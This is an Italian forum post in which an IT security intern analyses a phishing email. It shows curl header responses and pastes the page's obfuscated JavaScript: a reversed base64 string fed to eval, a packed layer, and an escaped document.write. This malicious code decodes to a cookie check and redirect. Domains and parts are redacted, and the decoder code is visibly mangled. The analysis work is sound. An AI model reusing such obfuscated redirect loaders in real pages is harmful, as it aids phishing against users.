Recentemente la mia azienda ha ricevuto un'e-mail di phishing diffusa, fortunatamente nessuno ha fatto clic sul collegamento (che è fantastico!)
Dato che sono uno studente e uno stagista attuale che lavora in IT Security, volevo vedere cosa conteneva questa email di phishing.
Ho iniziato con l'esecuzione di un comando cURL sul link e ho ottenuto un altro link al suo interno. Fondamentalmente il collegamento ha fatto riferimento al secondo URL e aggiornato ogni 2 secondi.
Ho usato un comando cURL su quel collegamento e ho ottenuto ciò che segue nella risposta dell'intestazione
(Rimosso link e domini per prevenire l'infezione!)
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Sat, 21 May 2016 22:07:32 GMT
Content-Type: text/html
Content-Length: 4713
Connection: keep-alive
X-Powered-By: ARR/2.5(bb4753d98)
Set-Cookie: AFFID=370951; expires=Mon, 20-Jun-2016 22:07:26 GMT; Max-Age=2592000; path=/; domain=.XXXXX.(com)
Set-Cookie: SID=20AAA; expires=Mon, 20-Jun-2016 22:07:26 GMT; Max-Age=2592000; path=/; domain=.xxxxx.(com)
All'interno di quel corpo, c'era una javascript contenente questo codice.
var lOO = '==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'; function OII(data) { var _1O0lOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = ''; do { h1 = _1O0lOI.indexOf(data.charAt(i++)); h2 = _1O0lOI.indexOf(data.charAt(i++)); h3 = _1O0lOI.indexOf(data.charAt(i++)); h4 = _1O0lOI.indexOf(data.charAt(i++)); bits = h1 > 16 & 0xff; o2 = bits >> 8 & 0xff; o3 = bits & 0xff; if (h3 == 64) { enc += String.fromCharCode(o1) } else if (h4 == 64) { enc += String.fromCharCode(o1, o2) } else { enc += String.fromCharCode(o1, o2, o3) } } while (i = 0; i--) { ret += string.charAt(i); } return ret; } eval(OII(_1O0(lOO)));
Visto che questo è un Decodifica Base64 l'ho eseguito in un compilatore, invece di usare eval () ho usato console.log () per stampare i risultati.
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('2i(26(p,a,c,k,e,d){e=26(c){25(c35?2a.2e(c+29):c.2d(36))};2b(!\'\'.27(/^/,2a)){28(c--){d[e(c)]=k[c]||e(c)}k=[26(e){25 d[e]}];e=26(){25\'\\w+\'};c=1};28(c--){2b(k[c]){p=p.27(2c 2f(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}25 p}(\'1p(U(p,a,c,k,e,d){e=U(c){W(c1s?1r.1m(c+1g):c.1f(1e))};1h(c--){1i(k[c]){p=p.1k(1j 1o(\\'\\\\b\\'+e(c)+\\'\\\\b\\',\\'g\\'),k[c])}}W p}(\\'M I=\\\\'%H%b%8%a%3%o%4%2%4%C%o%0%h%j%4%0%G%4%g%L%5%s%5%b%8%a%3%o%4%j%J%9%e%n%6%8%4%3%1%6%2%5%a%0%x%8%1%1%d%3%0%b%x%0%6%5%k%7%0%c%l%m%9%z%9%i%s%5%a%2%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%2%l%6%5%s%3%B%5%4%1%a%f%8%1%1%d%3%0%r%6%5%k%7%0%c%m%2%E%2%4%a%n%0%2%w%2%e%5%7%b%0%v%9%9%i%3%e%2%l%4%C%o%0%1%e%2%6%5%s%3%B%5%4%1%a%f%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%h%2%j%n%6%c%0%e%3%6%0%c%j%2%D%D%2%F%8%1%1%d%3%0%r%6%5%k%7%0%c%m%9%i%z%2%9%i%i%c%1%8%n%t%0%6%4%f%8%1%1%d%3%0%h%j%4%0%b%4%8%1%1%d%3%0%j%v%9%i%i%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%2%l%c%1%8%n%t%0%6%4%f%8%1%1%d%3%0%f%3%6%c%0%G%N%e%l%j%4%0%b%4%8%1%1%d%3%0%j%m%2%F%h%2%p%S%m%2%E%2%4%a%n%0%2%w%2%e%5%7%b%0%v%9%i%A%9%i%a%0%4%n%a%6%2%l%8%1%1%d%3%0%r%6%5%k%7%0%c%m%v%9%A%9%3%e%2%l%5%a%0%x%8%1%1%d%3%0%b%x%0%6%5%k%7%0%c%l%m%m%2%z%9%2%2%2%2%q%3%6%c%1%q%f%7%1%8%5%4%3%1%6%f%u%a%0%e%2%h%2%y%u%4%4%o%w%g%g%R%O%K%p%q%0%3%B%u%4%7%1%b%b%f%4%1%o%7%1%s%0%7%C%e%1%a%t%1%4%3%1%6%f%8%1%t%g%n%b%g%5%7%t%d%g%8%7%5%p%b%5%e%e%7%1%q%0%a%p%1%3%7%g%y%v%9%A%2%0%7%b%0%2%z%9%2%2%2%2%q%3%6%c%1%q%f%7%1%8%5%4%3%1%6%f%u%a%0%e%2%h%2%y%u%4%4%o%w%g%g%b%5%s%0%p%4%u%0%p%q%3%7%c%p%5%6%3%t%5%7%b%f%6%0%4%g%y%v%9%A%9%H%g%b%8%a%3%o%4%J\\\\';[removed for protection]|2Z|2M|2N|2O|2L|2K|2H|2I|2J|2P|2Q|2W|2X|30|2Y|2V|2U|2R|2S\'.2h(\'|\'),0,{}))',62,204,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|replace|while||String|if|new|toString|fromCharCode|RegExp|parseInt|split|eval|u0065|u0020|u006f|u006b|u0022|u0072|u002e|u0063|u0061|u0069|u006e|56|62|129|u0074|u000a|_escape|u0066|u0009|u003d|u0073|u002f|u0064|u006c|u0029|u0067|u0028|u0075|u0045|u0034|u0070|u0077|u0076|u002d|u0068|u003b|u003e|u006d|u007b|u005f|u0027|u003a|u0079|u007d|u003f|u0021|u006a|u0078|||u003c|u0062|u0039|var|u0026|write|u0036|document|unescape|u0031|u004f'.split('|')))
L'ho eseguito nel link e ho ottenuto risultati restituiti
var _escape = '%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u003e%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0061%u0072%u0065%u005f%u0063%u006f%u006f%u006b%u0069%u0065%u0073%u005f%u0065%u006e%u0061%u0062%u006c%u0065%u0064%u0028%u0029%u000a%u007b%u000a%u0009%u0076%u0061%u0072%u0020%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0064%u0020%u003d%u0020%u0028%u006e%u0061%u0076%u0069%u0067%u0061%u0074%u006f%u0072%u002e%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%[removed for protection]; document.write(unescape(_escape));
Successivamente ho preso il codice sostituito document.write con console.log e sono tornato con il seguente javascript.
function are_cookies_enabled() { var cookieEnabled = (navigator.cookieEnabled) ? true : false; if (typeof navigator.cookieEnabled == "undefined" && !cookieEnabled) { document.cookie = "testcookie"; cookieEnabled = (document.cookie.indexOf("testcookie") != -1) ? true : false; } return (cookieEnabled); } if (are_cookies_enabled()) { window.location.href = 'website'; } else { window.location.href = 'certain website'; }
Vedendo questi due siti web ho usato cURL sul primo link e ho restituito questa intestazione
HTTP/1.1 301 Moved Permanently Server: nginx/1.8.1 Date: Sat, 21 May 2016 21:42:15 GMT Content-Type: text/html Content-Length: 33 Connection: keep-alive X-Powered-By: ARR/2.5(441192e35) Location: (link to second website in javascript)
Il corpo di questo link conteneva un reindirizzamento al secondo link. Eseguendo cURL ho ricevuto questa risposta di intestazione
HTTP/1.1 302 Found Server: nginx/1.9.9 Date: Sat, 21 May 2016 21:42:38 GMT Content-Length: 11 Connection: keep-alive location: (link to header response from first link)
Il corpo contenuto era un "reindirizzamento". Apparentemente facendo riferimento al secondo collegamento con i cookie dell'intestazione come visto sopra, impostando il cookie su un percorso del dominio.
Quindi la mia domanda è, ho de-offuscato il codice correttamente? Questo malware sta tentando di creare un cookie di prova e reindirizzare a un altro sito Web dannoso?
Voglio solo capire perché non basta eseguire il javascript proprio lì invece di reindirizzare dappertutto? E qual è lo scopo di impostare il cookie sul dominio? È una backdoor, botnet, ddos?